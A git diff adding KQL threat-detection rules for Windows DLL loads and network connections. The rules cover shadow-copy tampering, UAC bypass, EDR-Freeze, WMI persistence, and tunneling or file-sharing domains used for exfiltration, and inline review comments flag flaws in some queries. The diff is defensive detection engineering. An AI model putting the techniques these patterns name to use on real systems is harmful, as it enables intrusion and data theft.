diff --git a/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vss_ps_dll_load.kql b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vss_ps_dll_load.kql
new file mode 100644
index 00000000..8852defd
--- /dev/null
+++ b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vss_ps_dll_load.kql 
@@ -0,0 +1,12 @@
+// Title: Suspicious Volume Shadow Copy VSS_PS.dll Load
+// Author: Markus Neis, @markus_neis
+// Date: 2021-07-07
+// Level: high
+// Description: Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes.
+// It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts.
+// The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\vssadmin.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vssapi_dll_load.kql b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vssapi_dll_load.kql
new file mode 100644
index 00000000..72721a75
--- /dev/null
+++ b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vssapi_dll_load.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Volume Shadow Copy Vssapi.dll Load
+// Author: frack113
+// Date: 2022-10-31
+// Level: high
+// Description: Detects the image load of VSS DLL by uncommon executables
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\vssapi.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) and (not(((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/suspicious_wsman_provider_image_loads.kql b/KQL/rules/windows/image_load/suspicious_wsman_provider_image_loads.kql
new file mode 100644
index 00000000..3bf781cb
--- /dev/null
+++ b/KQL/rules/windows/image_load/suspicious_wsman_provider_image_loads.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious WSMAN Provider Image Loads
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-24
+// Level: medium
+// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.lateral-movement, attack.t1021.003
+
+DeviceImageLoadEvents
+| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\PowerShell\\6\\pwsh.exe", "C:\\Program Files (x86)\\PowerShell\\7\\pwsh.exe", "C:\\Program Files\\PowerShell\\6\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")) or InitiatingProcessFolderPath endswith "\\mmc.exe" or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/system_control_panel_item_loaded_from_uncommon_location.kql b/KQL/rules/windows/image_load/system_control_panel_item_loaded_from_uncommon_location.kql
new file mode 100644
index 00000000..667c079f
--- /dev/null
+++ b/KQL/rules/windows/image_load/system_control_panel_item_loaded_from_uncommon_location.kql
@@ -0,0 +1,10 @@
+// Title: System Control Panel Item Loaded From Uncommon Location
+// Author: Anish Bogati
+// Date: 2024-01-09
+// Level: medium
+// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\hdwwiz.cpl" or FolderPath endswith "\\appwiz.cpl") and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/third_party_software_dll_sideloading.kql b/KQL/rules/windows/image_load/third_party_software_dll_sideloading.kql
new file mode 100644
index 00000000..f9c3f0a9
--- /dev/null
+++ b/KQL/rules/windows/image_load/third_party_software_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Third Party Software DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/time_travel_debugging_utility_usage_image.kql b/KQL/rules/windows/image_load/time_travel_debugging_utility_usage_image.kql
new file mode 100644
index 00000000..8320f98e
--- /dev/null
+++ b/KQL/rules/windows/image_load/time_travel_debugging_utility_usage_image.kql
@@ -0,0 +1,12 @@
+// Title: Time Travel Debugging Utility Usage - Image
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-06
+// Level: high
+// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001
+// False Positives:
+// - Legitimate usage by software developers/testers
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/trusted_path_bypass_via_windows_directory_spoofing.kql b/KQL/rules/windows/image_load/trusted_path_bypass_via_windows_directory_spoofing.kql
new file mode 100644
index 00000000..34402445
--- /dev/null
+++ b/KQL/rules/windows/image_load/trusted_path_bypass_via_windows_directory_spoofing.kql
@@ -0,0 +1,13 @@
+// Title: Trusted Path Bypass via Windows Directory Spoofing
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-17
+// Level: high
+// Description: Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification.
+// This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.007, attack.t1548.002
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath contains ":\\Windows \\System32\\" or FolderPath contains ":\\Windows \\SysWOW64\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/uac_bypass_using_iscsicpl_imageload.kql b/KQL/rules/windows/image_load/uac_bypass_using_iscsicpl_imageload.kql
new file mode 100644
index 00000000..34e30f70
--- /dev/null
+++ b/KQL/rules/windows/image_load/uac_bypass_using_iscsicpl_imageload.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Iscsicpl - ImageLoad
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-17
+// Level: high
+// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/uac_bypass_with_fake_dll.kql b/KQL/rules/windows/image_load/uac_bypass_with_fake_dll.kql
new file mode 100644
index 00000000..22219519
--- /dev/null
+++ b/KQL/rules/windows/image_load/uac_bypass_with_fake_dll.kql
@@ -0,0 +1,12 @@
+// Title: UAC Bypass With Fake DLL
+// Author: oscd.community, Dmitry Uchakin
+// Date: 2020-10-06
+// Level: high
+// Description: Attempts to load dismcore.dll after dropping it
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1574.001
+// False Positives:
+// - Actions of a legitimate telnet client
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/vba_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/vba_dll_loaded_via_office_application.kql
new file mode 100644
index 00000000..cb302d18
--- /dev/null
+++ b/KQL/rules/windows/image_load/vba_dll_loaded_via_office_application.kql
@@ -0,0 +1,12 @@
+// Title: VBA DLL Loaded Via Office Application
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: high
+// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - Legitimate macro usage. Add the appropriate filter according to your environment
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\VBE7.DLL" or FolderPath endswith "\\VBEUI.DLL" or FolderPath endswith "\\VBE7INTL.DLL") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql b/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql
new file mode 100644
index 00000000..1ed73a09
--- /dev/null
+++ b/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql
@@ -0,0 +1,13 @@
+// Title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-27
+// Level: medium
+// Description: Detects WerFaultSecure.exe loading dbgcore.dll or dbghelp.dll which contains the MiniDumpWriteDump function.
+// The MiniDumpWriteDump function creates a minidump of a process by suspending all threads in the target process to ensure a consistent memory snapshot.
+// The EDR-Freeze technique abuses WerFaultSecure.exe running as a Protected Process Light (PPL) with WinTCB protection level to suspend EDR/AV processes.
+// By leveraging MiniDumpWriteDump's thread suspension behavior, edr-freeze allows malicious activity to execute undetected during the suspension period.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\dbghelp.dll") and InitiatingProcessFolderPath endswith "\\WerFaultSecure.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql b/KQL/rules/windows/image_load/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql
new file mode 100644
index 00000000..de812aaa
--- /dev/null
+++ b/KQL/rules/windows/image_load/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql
@@ -0,0 +1,13 @@
+// Title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-09-02
+// Level: medium
+// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.privilege-escalation, attack.persistence, attack.t1546.003
+// False Positives:
+// - Legitimate event consumers
+// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/wmi_persistence_command_line_event_consumer.kql b/KQL/rules/windows/image_load/wmi_persistence_command_line_event_consumer.kql
new file mode 100644
index 00000000..467affdb
--- /dev/null
+++ b/KQL/rules/windows/image_load/wmi_persistence_command_line_event_consumer.kql
@@ -0,0 +1,12 @@
+// Title: WMI Persistence - Command Line Event Consumer
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: high
+// Description: Detects WMI command line event consumers
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence
+// False Positives:
+// - Unknown (data set is too small; further testing needed)
+
+DeviceImageLoadEvents
+| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" and FolderPath endswith "\\wbemcons.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql
new file mode 100644
index 00000000..99e37d51
--- /dev/null
+++ b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql
@@ -0,0 +1,16 @@
+// Title: WMIC Loading Scripting Libraries
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-17
+// Level: medium
+// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
+// It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - The command wmic os get lastbootuptime loads vbscript.dll
+// - The command wmic os get locale loads vbscript.dll
+// - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights
+// - The command `wmic ntevent` loads vbscript.dll
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/wmiprvse_wbemcomn_dll_hijack.kql b/KQL/rules/windows/image_load/wmiprvse_wbemcomn_dll_hijack.kql
new file mode 100644
index 00000000..b72e7a95
--- /dev/null
+++ b/KQL/rules/windows/image_load/wmiprvse_wbemcomn_dll_hijack.kql
@@ -0,0 +1,10 @@ +// Title: Wmiprvse Wbemcomn DLL Hijack +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-12 +// Level: high +// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002 + +DeviceImageLoadEvents +| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/communication_to_localtonet_tunneling_service_initiated.kql b/KQL/rules/windows/network_connection/communication_to_localtonet_tunneling_service_initiated.kql new file mode 100644 index 00000000..32346cc3 --- /dev/null +++ b/KQL/rules/windows/network_connection/communication_to_localtonet_tunneling_service_initiated.kql @@ -0,0 +1,14 @@ +// Title: Communication To LocaltoNet Tunneling Service Initiated +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-06-17 +// Level: high +// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. +// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. +// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 +// False Positives: +// - Legitimate use of the LocaltoNet service. + +DeviceNetworkEvents +| where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com" \ No newline at end of file 
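Review bot: communication_to_localtonet_tunneling_service_initiated.kql matches on RemoteUrl alone, and in DeviceNetworkEvents that column is populated only when the sensor could associate a hostname or URL with the connection; a connection to the same infrastructure made by bare IP, or resolved off-host, carries an empty RemoteUrl and silently falls outside the rule. Analysts reading a zero-hit result as absence would be misled, so the header deserves a coverage note such as `// Note: matches only events where RemoteUrl is populated; IP-only connections are not covered`. The same caveat applies to every RemoteUrl-only rule added in this commit (ngrok, portmap.io, BTunnels, Cloudflared, DevTunnels, Mega, VS Code tunnels).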
diff --git a/KQL/rules/windows/network_connection/communication_to_ngrok_tunneling_service_initiated.kql b/KQL/rules/windows/network_connection/communication_to_ngrok_tunneling_service_initiated.kql new file mode 100644 index 00000000..405d7d7e --- /dev/null +++ b/KQL/rules/windows/network_connection/communication_to_ngrok_tunneling_service_initiated.kql @@ -0,0 +1,14 @@ +// Title: Communication To Ngrok Tunneling Service Initiated +// Author: Florian Roth (Nextron Systems) +// Date: 2022-11-03 +// Level: high +// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. +// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. +// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 +// False Positives: +// - Legitimate use of the ngrok service. + +DeviceNetworkEvents +| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/communication_to_uncommon_destination_ports.kql b/KQL/rules/windows/network_connection/communication_to_uncommon_destination_ports.kql new file mode 100644 index 00000000..bffd61f0 --- /dev/null +++ b/KQL/rules/windows/network_connection/communication_to_uncommon_destination_ports.kql 
@@ -0,0 +1,10 @@ +// Title: Communication To Uncommon Destination Ports +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: medium +// Description: Detects programs that connect to uncommon destination ports +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1571 + +DeviceNetworkEvents +| where (RemotePort in~ ("8080", "8888")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/local_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/windows/network_connection/local_network_connection_initiated_by_script_interpreter.kql new file mode 100644 index 00000000..f6a7ead2 --- /dev/null +++ b/KQL/rules/windows/network_connection/local_network_connection_initiated_by_script_interpreter.kql 
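Review bot: `RemotePort in~ ("8080", "8888")` applies the case-insensitive string operator with string literals to RemotePort, which is an integer column in DeviceNetworkEvents; that is a type mismatch KQL should reject rather than a working port filter, and it needs to be `RemotePort in (8080, 8888)`. The private-range exclusion in the same hunk also passes IPv6 prefixes (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"`) to `ipv4_is_in_range()`, which cannot parse them and yields null; since `not(null)` is still null, any event with an IPv6 RemoteIP is dropped from the result instead of being classified as public or private. The same `ipv4_is_in_range()` misuse is repeated in local_network_connection_initiated_by_script_interpreter.kql and microsoft_sync_center_suspicious_network_connections.kql, so the fix belongs in the converter's CIDR handling: emit `ipv6_is_in_range()` for IPv6 prefixes and wrap the combined test so a null comparison does not discard the row.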
@@ -0,0 +1,12 @@ +// Title: Local Network Connection Initiated By Script Interpreter +// Author: frack113 +// Date: 2022-08-28 +// Level: medium +// Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate scripts + +DeviceNetworkEvents +| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/microsoft_sync_center_suspicious_network_connections.kql b/KQL/rules/windows/network_connection/microsoft_sync_center_suspicious_network_connections.kql new file mode 100644 index 00000000..79d3d137 --- /dev/null +++ b/KQL/rules/windows/network_connection/microsoft_sync_center_suspicious_network_connections.kql 
@@ -0,0 +1,10 @@ +// Title: Microsoft Sync Center Suspicious Network Connections +// Author: elhoim +// Date: 2022-04-28 +// Level: medium +// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql b/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql new file mode 100644 index 00000000..788867e1 --- /dev/null +++ b/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql 
@@ -0,0 +1,12 @@ +// Title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-08-30 +// Level: high +// Description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule. + +DeviceNetworkEvents +| where (RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "github.com" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev") and 
